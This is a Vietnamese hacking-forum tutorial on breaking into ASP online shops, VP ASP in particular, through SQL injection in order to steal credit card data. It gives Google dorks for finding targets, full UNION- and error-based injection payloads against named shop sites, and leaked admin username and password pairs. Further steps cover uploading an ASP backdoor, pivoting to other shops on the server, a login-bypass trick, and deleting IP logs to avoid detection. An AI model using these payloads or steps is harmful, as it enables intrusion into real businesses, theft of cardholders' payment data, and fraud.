You Are Here: Home » Menu » Security & Hacking & Cracking » Hacking » SQL Injections » Hack shop với lỗi sql injection

Hack shop với lỗi sql injection

Hack shop với lỗi sql injection

Những ai mới tập hack đề chơi VP ASP trước , shop dạng này bây giờ tuy
khó mà kiếm được hàng ngon nhưng anh em cứ thực hành để tích lũy kinh
nghiệm. Hơn nữa cấu trúc DB của VP ASP ta biết rõ , việc truy vẫn sẽ dễ
dàng hơn.

Ok , nói về VP ASP trước nhá

Hiểu sơ về các table của VP ASP nhé , tất cả table của nó đây :

Activity
affiliatelog
affiliates
billing
categories
configuration
configuration1
Contact
coupons
customerprices
customers
downloads
gifts
GroupMembers
Groups
hackers
languages
mycompany
oitems
orders
ordertracking
Organization
OrganizationActivity
pinnumbers
prodcategories
prodfeatures
products
projects
quantitydiscounts
registrant
registryitems
reviews
savedcarts
searchresults
shipmethods
smclads
smclcategory
smclfavorites
smclgetnotified
smclicons
smclimages
smclorders
smclpreferences
smcltest
smcltransactions
smumblockedemailids
smumgroups
smummaillist
smumpreferences
smumtest
smumusergroups
smumuserlogs
smusermanager
suppliers
tbl_medi0001
tblaccess
tbllog
tbluser
templates
xlaAFPforms
xlaAFPiUsersForms
xlaAFPsubmissions
xlaAFPusers
xlaALSBusy
xlaALSCans
xlaALSCustomers
xlaALSDepts
xlaALSiDeptsCans
xlaALSiUsersCans
xlaALSiUsersDepts
xlaALSRequests
xlaALSUsers
xlaALSVisitors
xlaAPManswers
xlaAPMiPollsPerZone
xlaAPMpolls
xlaAPMquestions
xlaAPMreplies
xlaAPMvotes
xlaAPMzones
Những table đáng chú ý để anh em khai thác là : tbluser , orders , configuation

*** Sử dụng Google để search với từ khóa sau :

allinurl : “shopdisplayproducts.asp?id=
allinurl : “shopaddtocart.asp?id=
allinurl : “shoptellafriend.asp?id=
allinurl : “shopexd.asp?id=
……….

Thêm ‘ vào sau để check lỗi , nếu id không thấy lỗi thì chuyển sang cat .

Có hai dạng lỗi sau :

1. JET Database

VD : hxxp://www.amf-christian-videos.com/sho … asp?id=27′
Trích:

Microsoft JET Database Engine error ’80040e14′

Syntax error in string in query expression ‘cc.intcatalogid=p.catalogid
and cc.intcategoryid=c.categoryid and cc.intcategoryid = 27′ and
hide=0 order by specialoffer desc,cname’.

/shop/shop$db.asp, line 424
*** User và pas admin . Table khai thác : tbluser. ****

Sử dụng câu lệnh Union
Trích:

%20union%20%20select%201,2,3,4,5,6,7,8,9….%20fro m%20tbluser%27
Vấn đề đối với lỗi này là việc thêm số , hơi mất thời gian. Kinh nghiệm
bản thân emily cho thấy shop hay bị dính lỗi ở những line này và số
column tương ứng , anh em gặp cứ điền đúng số là ra.

Trích:
Trích:

line191 –>> 56
line184 –>> 47,43,53
line188 –>> 53,56, 60
line191 –>> 48
line185 –>> 86,43
line202 –>> 84,91
line208 –>> 48,57
line64 –>> 53
line62—>>37
line67—>>48,53
line211 –>> 43
line59 –>> 70
line58 –>> 37,43,57
line 60 –>>47,48,49 ,53,50,56,60,85
line 57 –>> 37,38,58
line 916 –>>>37
line 930 —>>37
line476–>>>47
line 47–>>30
line912—->>37
line467—->>47
line61—>>53
line53—->>34,35
line 467 —–> 47
line 468 ——> 47
line 469 ——-> 48
line191 — 56
line184 — 47,43,53
line188 — 53,56
line191 — 48
line185 — 86,43
line202 — 84,91
line208 — 48,57
line64 — 53
line211,187 — 43
line59 — 70
line 467 —–>47
line465—–47
line 468 ——> 47
line 469 ——-> 48
line 876–>>43
Như cái shop ở trên:
Line 424 , điền đến số 43 nhé :
Trích:

htxp://www.amf-christian-videos.com/sho … 0%20select%
201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36
,37,38,39,40,41,42,43%20from%20tbluser%27
Hiện ra cái bảng dễ thương nhé ,chú ý ba số 3 , 4 ,22, khai thác user và pass của admin nào :

Chèn fldusername%2b’%20//%20′%2bfldPassword vào một trong ba số đó .
Trích:

htxp://www.mountieshop.com/shopdisplayp … 0%20select%
201,2,fldusername%2b’%20//%20′%2bfldPassword,4,5,6,7,8,9,10,11,12,13,14,15,1
6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,
33,34,35,36,37,38,%2039,40,41,42,43,44,45,46,47,48 %20from%20tbluser%27
Lấy được user và pass nhé :
Trích:

amy // goofball159
mike // wmdwjwd159
ray // littleandi159
sheila // hidavid159
*** Link admin . Table cần khai thác : configuration ****
Trích:

htxp://www.amf-christian-videos.com/sho … 0%20select%
201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36
,37,38,39,40,41,42,43%20from%20configuration%27
Chèn fieldname%2b%27/%27%2bfieldvalue vào số 3 như trên:
Trích:

htxp://www.amf-christian-videos.com/sho … 0%20select%
201,2,fieldname%2b%27/%27%2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,
17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33
,34,35,36,37,38,39,40,41,42,43%20from%20configurat ion%27
Nó vẫn ra vậy , nhưng hãy nhìn vị trí số 3 , có khoảng hơn 10 page ,
hãy view từng page và tìm giá trị tương ứng với xadminpage nhé . Ở đây
là :
Trích:

xadminpage/shopadmin.asp
Login đi nào :
Trích:

htxp://www.amf-christian-videos.com/shop/shopadmin.asp

Rất hay gặp shop bị mắc lỗi ở file shopdisplayproducts.asp cũng sẽ dính ở shopexd.asp , anh em chuyển sang file nay` :
Trích:

hxtp://www.amf-christian-videos.com/sho … asp?id=27′
Lối thường gặp đối với file này chỉ quanh quẩn các line 57,58,60…Thời
gian hack sẽ nhanh hơn vì đã có sẵn số cần thêm. Đến khi hiện ra số 27
(đôi khi 28 , 47 , 48.. ) có cái màu đỏ hoặc xanh dễ mến thì làm như
trên nhé , chú ý thay vào số 27 chứ kô phải 3 , 4 hay 22.

Trường hợp gặp shop 2 pass .

VD : htxp://www.xxxxxxx.com/shopexd.asp?id=46

Pass thứ hai không phải là biến mà là hằng nên không thể truy vấn trực
tiếp nó đươc,ý đồ của ta là ta phải view file admin mới xem được .

Code:
Trích:

%20union%20%20select%201,2,fieldname,4,5,6,7,8,9,1
0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,
fieldvalue,28,29,30,31,32,33,34,35,36,37,38,%2039,
40,41,42,43,44,45,46,47,48%20from%20configuration% 27
Chú ý dòng đầu tiên của cái mớ bòng bong hiện ra đó .
Trích:

SecondPassword=”exit_all”
Tỉ lệ lấy được pass2 không dược 100% , một số shop change table config .
Trường hợp này anh em get CC trưc tiếp . Chèn đoạn sau vào số 3 như
trên :
Trích:

ocardtype%2b’—’%2bocardno%2b’—’%2boauthorization%2b’—’%2bocardexpires%2b’—’%2bofirstname%2b’—’%2bolastname%2b’—’%2boaddress%2b’—’%2bocity%2b’—’%2bostate%2b’—’%2bopostcode%2b’—’%2bocountry%2b’—’%2boemail%2b’—’%2bophone

Nếu không hiện hết được ccinffo thì cắt nó ra cho vào hai hoặc ba số 3 ,4 ,22….Thế nhé !

2. Lỗi SQL Server
Trích:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”.

/shopping/$.asp, line 365
Đỗi với lỗi này thì hack nhanh hơn , ta truy vấn ngay để biết xem shop có cvv hay không hay shop bị mã hóa.

Code lấy CC trực tiếp :
Trích:

%20or%201=convert(int,(select%20top%201%20convert(
varchar,isnull(convert(varchar,orderid),’NULL’))%2
b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,odat
e),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocar

dtype),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocar

dno),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocar

dexpires),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,oaut

horization),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocar

dname),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocar

daddress),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ofir

stname),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,olas

tname),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,oadd

ress),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocit

y),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,osta

te),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,opos

tcode),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,ocou

ntry),’NULL’))%2b’%20[emily]%20%20′%2bconvert(varchar,isnull(convert(varchar,o

phone),’NULL’))%2b’%20[emily]%20′%2bconvert(varchar,isnull(convert(varchar,oema
il),’NULL’))%20from%20orders%20where%20ocardno%20n
ot%20in(‘NULL’)%20and%20orderid%20not%20in%20(’257
16′,’25717′,’25719′)))–sp_password
Nếu OK thì khai thác admin vào quậy chơi.

User and pass :
Trích:

%20and%201=convert(int,(select%20top%201%20flduser name%2b’ // ‘%2bfldPassword%20from%20tbluser))–sp_password
Link admin :
Trích:

%20and%201=convert(int,(select%20top%201%20fieldna
me%2b’%20//%20′%2bfieldvalue%20from%20configuration%20where%2
0fieldname%20not%20in%20(‘affallowaffiliatesreview
orders’,'affcommissionincludesallorders’,'affcommi
ssionIncludesshipping’,'affcommissionrate’,'affdir
ecturl%20′,’affinfourl’,'affpaymenttypes’,%20′affs
ubject’,%20′afftemplateaffiliate’,'afftemplateMerc
hant’,'affwebsite%20′,’xaddcatalogid’,'xaddproduct
subcategorybycategory’,'xaddproductsupplierdropdow
n’,'xadminmenucheck’,'xadminrestrictproducts’)))–sp_password
Thật gọn nhẹ đúng không ??!!!

Vào được shop rồi , có CVV hay không …hên xui , làm gì tiếp đây ??!!

1.Gặp shop nhiều orders mà nó buy qua paygate mới đau ! Anh em vào
coniguration củashop chỉnh lại cho nó orders trực tiếp qua shop và
tranh thủ vào trước admin để get CVV xài ngay. Cái này chỉ là hạ sách
khi đói lòng thôi , vì trước sau gì nó cũng biết .
2.Anh em vào nhớ khi ra thì vào Log HIstory del IP log của mình đi nhé ,
thấy IP nào lạ lạ check luôn, thấy cái nào của VN thì coi như có thegf
ngu nòa đó xơi rồi , cho nò die luôn.

Hack shop với lỗi sql injection!!!(III)

Bây giờ tìm cách chơi lên server , cái này mới là quan trọng. Xin trích
lại bài của Yami cho anh em tham khảo , him ấy viết cũng đã đầy đủ
rồi.

Nghe thì ghê gớm lắm xong lại rất đơn giản. Bạn vào mục Display
Products và Edit bất kì một sản phẩm nào. Kéo xuống, bạn sẽ thấy dòng
chữ upload images, click vào đó. Hoặc nếu không thấy, vì thăng chủ shop
hơi bị khôn thì dán page này vào: shopa_upload.asp Sau đó bấm
Browse… và chọn 1 con backdoor từ máy của bạn để úp lên server của
nó. Nhớ là backdoor ASP nhé .

Dạo này thằng chủ shop cũng có nhiều đứa khôn lắm, nên có thể up thành
công hoặc không. Upload thành công thì nó sẽ báo là Upload has been
sucess… và bên dưới là đường dẫn chứa backdoor của bạn, copy và dán
lên url rồi….

Lên server rồi thì tự mò nha, cũng dễ thôi …

Mà mục đích lên server là gì nhỉ? Là để tìm kiếm nhữ site shop khác
cũng thuê chỗ tại server đó. Bạn sẽ có quyền tải file, dựa vào khả năng
phán đoán bạn sẽ biết nó cất csdl ở đâu và down về. Khi up con này lên
server rồi, thì bạn bấm up để trở ra thư mục lớn hơn, rồi nhìn lên
url, bạn sẽ thấy nguyên cái đường dẫn, bạn thay đổi đường dẫn… cứ
tưởng tượng đơn giản, đó là cái máy tính của bạn vậy.

Sau khi các bạn lên server, và tìm được thư mục chứa các website thì
công việc tiếp theo là phải tìm cho được đâu là cái shop để tiếp tục
kiếm cici

Nếu như nó đặt tên thư mục cho mỗi site là tên gợi nhớ (domain của
site) thì chắc hẳn các bạn dễ dàng gõ vào address của trình duyệt cái
domain của site đó và biết nó có phải là 1 shop hay không! Nhưng nó lại
không thích đặt vậy, mà lại đánh kí tự số cho từng site, hoặc đặt tên
lung tung thì bạn làm thế nào để biết được domain của nó là gì? Nếu như
phải down 1 vài page về, nhìn vào baner hay hình ảnh nào đó hoặc phần
copyright có thể có tên miền thì quả thật là hơi mất thời gian và có
thể là không tìm thấy.

Cách hữu hiệu nhất, đơn giản nhất và tốt nhất là bạn nên sử dụng
google. Download 1 page về, copy phần copyright hoặc phần đặc trưng của
site vào ô search của google. Bấm enter, bạn sẽ thấy được … trang
bạn cần tìm.
Hoặc vào google gõ cú pháp sau:

“cụm từ đặc trưng trong page” inurl:[tên của page bạn down về]

Okie, thế là đã tìm được tên miền, và hãy tìm xem có shop nào không?
Khi đã tìm ra 1shop, dù cho shop đó cất kĩ database đến đâu, hay không
có lỗi, bạn vẫn có thể lấy cc của nó được

Ví dụ, mình tìm được 1 thư mục tên A có chứa site shop. Vào trong thư
mục đó, 1 là bạn có thể tìm thấy database và down về, xong nếu không
thể lấy được thì hãy tìm page login admin của nó! Bạn đang ở trên
server mà, nên việc tìm page của admin cũng không khó lắm. Khi đã tìm
ra, username và pass ở đâu để bạn có thể đăng nhập nhỉ ??? Và shopnày
không hề có lỗi nào.

Đầu tiên bạn hãy down cái page admin về. Bấm vào dòng chữ “MASS TEST
IN…” của con backdoor, nó sẽ liệt kê cho bạn thấy những thư mục nào
bạn có thể upload file. Nhưng trước khi upload, bạn hãy sửa lại mã
nguồn ở page admin.

Xác định thư mục bạn sẽ upload. Tìm trong page admin (đã save về máy và
đã mở mã nguồn lên) xem có dòng include … thì thay đường dẫn cho
thích hợp, để từ thư mục bạn sẽ up lên, nó có thể tìm thấy file mà bạn
include. Tiếp đến tìm tù này: replace

Và bỏ hàm replace đi. Ví dụ trong code: user=replace(username,”’,'”‘).
Bỏ dòng này đi, tương tự đối với những chỗ khác, tuy nhiên bạn cần
phải linh hoạt hơn. Có những shopviet code sử dụng hảm replace như sau:
Select * from tbl where replace(user,”’,'”‘)… Nếu như thế này thì
bạn bỏ cái hàm replace thôi, và sẽ thành đoạn code như sau: select *
from tbl where user…

Xong xuôi rồi thì save lại và up lên thư mục bạn đã chọn.

Ví dụ domain của shop đó là: hxxp://yami.com/

link admin chính xác là: hxxp://yami.com/admin.asp

thư mục cho phép up là images.

Link bạn up trang admin giả lên sẽ có dạng: hxxp://yami.com/images/admin.asp

Rồi! Bạn hãy gõ hxxp://yami.com/images/admin.asp vào trình duyệt và thử login

Username: ‘or”=’
Password: ‘or”=’

bấm ok và page not found ^ ^… cái này các bạn đừng lo, vì trong file
include nó sẽ chỉ sang 1 trang mà admin đã đăng nhập không phải nằm
trong images nên page not found cung chẳng có gì là lạ. Tuy nhiên, máy
của bạn đã lưu cookie của admin nên bạn chỉ cần gõ đúng link admin:
hxxp://yami.com/admin.asp. Thế là nó tự động chuyển sang trang mà bạn
đã login vào admin. Vô được rồi thì… get cc thôi

VP ASP coi như xong , giờ nói về hack shop ASP dính SQL injection, xu
hướng anh em bây giờ hack kiểu này nhiều , và chỉ có chơi sql hoặc lên
server mới có nhiều hàng ngon.

Vấn đề quan trọng là việc tìm shop , những keyword nào để search sao cho
không đụng hàng , chưa ai hack . Emily xin chia sẻ với anh em vài key ,
còn lại anh em phải tự ngiên cứu và tìm tòi , sáng tạo thêm , cần suy
nghĩ một chút thì không có gì là khó.
Trích:

products.asp , prod.asp , viewprod.asp , proddetails.asp, product_details.asp, showitem.asp, viewonline.asp ………
Về cách khai thác sử dụng lệnh convert như nói trên đối với shop VP
ASP , có điều ở đây chúng ta không biết trước được các table nên phải
truy vấn từng table của shop.

Lấy VD một shop nhé :
Trích:

http://www.adapterbiz.com/_store/Display_Products.asp?prodID=CPQA-M700-AC”"target=”_blank”>http://www.adapterbiz.com/_store/Dis…D=CPQA-M700-AC
Lỗi :
Trích:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ‘CPQA-M700-AC’ ‘.

/_store/Display_Products.asp, line 82
TRuy vấn Table thứ nhất :
Code :
Trích:

%20and%201=convert(int,(select%20top%201%20table_n ame%20from%20information_schema.tables))–sp_password
Anh em chú ý , nhiều người hỏi tôi đã dùng đúng code mà sao không ra
table , tùy cấu trúc lỗi mà anh em cần uyển chuyển thay đổi 1 chút
trong code , thêm hoặc bớt dấu ‘ , hoặc thêm vào dấu ) , ….

Đối với shop này :
Trích:

http://www.adapterbiz.com/_store/Display_Products.asp?prodID=CPQA-M700-AC%27%20and%201=convert%28int,%28select%20top%201%
20table_name%20from%20information_schema.tables%29 %29–sp_password”"
target=”_blank”>http://www.adapterbiz.com/_store/Dis…)–sp_password
Lấy được table thứ nhất là ‘tblClassCat’ .
Trích:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value ‘tblClassCat’ to a column of data type int.

/_store/Display_Products.asp, line 82
Tiếp tục lấy table thứ hai bằng câu truy vấn loại trừ :
Trích:

http://www.adapterbiz.com/_store/Display_Products.asp?prodID=CPQA-M700-AC%27%20and%201=convert%28int,%28select%20top%201%
20table_name%20from%20information_schema.tables%20 where%”"
target=”_blank”>http://www.adapterbiz.com/_store/Dis…ables%20where%20table_name%20not%20in%20(‘tblClassCat%20′)))–sp_password
Table thứ hai là ‘Ask’
Trích:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘Ask’ to a column of data type int.

/_store/Display_Products.asp, line 82
Và cứ thế anh em thêm những table đã lấy vào cuối câu truy vấn mà lấy lần lượt các table còn lại.
Chú ý những table nào cần cho mình , chẳng hạn : users , admin ,
tbladmin , orders , customer, tblorders , adminlog , creditcard ,
cccode , ….

Dùng code sau để khai thác các column của table đó:
Trích:

%20and%201=convert(int,(select%20top%201%20column_
name%20from%20information_schema.columns%20where%2 0table_name=(‘table
cần khai thác ‘)))–sp_password
Lấy tiếp table thứ hai :
Trích:

%20and%201=convert(int,(select%20top%201%20column_
name%20from%20information_schema.columns%20where%2 0table_name=(‘table
cần khai thác’)%20and%20column_name%20not%20in%20(‘column1
‘)))–sp_password
Cứ thế lấy lần lượt các comlumn cần thiết rồi ghép lại câu truy vấn như
sau để lấy info , như câu lệnh get CC trực tiếp của shop VP ASP như
trên , chỉ thay thế các column khác vào !

Anh em có thể sử dụng câu truy vấn điều kiện để lây thông tin CC theo năm hết hạn , ngày order , theo thể loại thẻ .

VD :
Trích:

where ocardno%20not%20in(‘null’) and right(ocardexpires,2) not in(’05′)))–sp_password
để loại bỏ những CC hết hạn năm 2007. Hoặc :
Trích:

where odate = (‘feb 2008′)
để lấy những order trong tháng 2 -2008 .

Cái này thì anh em tự uyển chuyển mà khai thác nhé !

Nói chung hack SQL Ịnect thì chỉ có vậy , không có gì phức tạp , nếu
tìm được admin user và link login thì vào shop , nếu không thì get
trực tiếp !
.

===========================================

Trên đây là những kiến thức cơ bản nhất để hack CC , ai đã từng hack
thì không có gì mới , đối tượng của bài viết là anh em chưa mới tập
tành hack , những ai pro có ý kiến gì hay thì bổ sung , chỗ nào sai sót
thì fix hộ emily . Lâu rồi cũng không hack nên không nghiên cứu gì
thêm , mong anh em tiếp lời , tạo điều kiện cho anh em newbie học hỏi.

Hiện nay mọi người đều dùng code để get hoặc tools để get, đây chỉ là kiến thức query bằng tay.

Sau khi mọi người nắm vững tôi sẽ post tiếp phần up backdoor, nâng
quyền SA, làm scam page cc thông qua shop admin hack được và cách một số
cách hack nâng cao hơn.

Nắm được phần hack shop asp thì áp dụng sang hack shop cfm sẽ rất dễ dàng!

Thân !!

Một số key search shop asp cho anh em:

allinurl:”shopdisplayproducts.asp?id=

allinurl:”shopdisplayproducts.asp?id=1

allinurl:”shopdisplayproducts.asp?id=2

allinurl:”.com/shopdisplayproducts.asp?id=

allinurl:”.net/shopdisplayproducts.asp?id=

.asp?=catalogid=

.asp?cid=

alliurl: shop$.asp?$=

shopexd.asp?

shopreviewlist.asp?id=1

About The Author

.H4z0r

Number of Entries : 392

Leave a Comment

You must be logged in to post a comment.

Vietnamese 2013 - GoodNews4.7

Scroll to top